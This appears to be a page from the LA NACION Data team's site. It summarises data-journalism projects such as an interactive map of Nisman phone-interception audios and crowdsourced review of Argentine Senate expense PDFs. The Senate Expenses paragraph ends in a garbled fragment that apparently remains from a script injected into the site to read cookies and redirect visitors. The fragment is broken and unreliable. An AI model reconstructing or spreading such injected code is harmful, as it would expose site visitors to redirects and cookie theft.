Project Description Since 2011 LN Data has been a strategy, a content initiative and a team whose goals are to facilitate open data journalism in LA NACION and impact for change in Argentina. Our team has been formed by the same initial three members, Ricardo, data engineer for investigative reporting in LN Data, Flor, research… Seguir leyendo LA NACION DATA TEAM (ARGENTINA)
Categoría: ENGLISH
Mapping Prosecutor Nisman phone interceptions
Date Published 18/1/2018 >>> Live Link <<< Project Description* We reused our database of 200 hundred audios and for a new anniversary of Prosecutor Nisman’s assasination, we published an interactive map to listen audios by location, as a playlist.
Open Collaboration :: Senate Expenses
Using our online collaborative platform Vozdata for Crowdsourcing, we continued during 2017 to open PDFs from Senate Expenses. and this year, during a civic marathon at LA NACION we got the visit of the new appointed Director of Senate Transparency. Take a look at our Facebook Album! “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}
Data Journalism, No Excuses
LA NACION DATA website is not just a website, it´s a strategy, a project and a team. The strategy has to do with the commitment of using data to tell stories and expand the use of data, preferably open data, to activate demand of public information, in a country that just passed a FOIA law… Seguir leyendo Data Journalism, No Excuses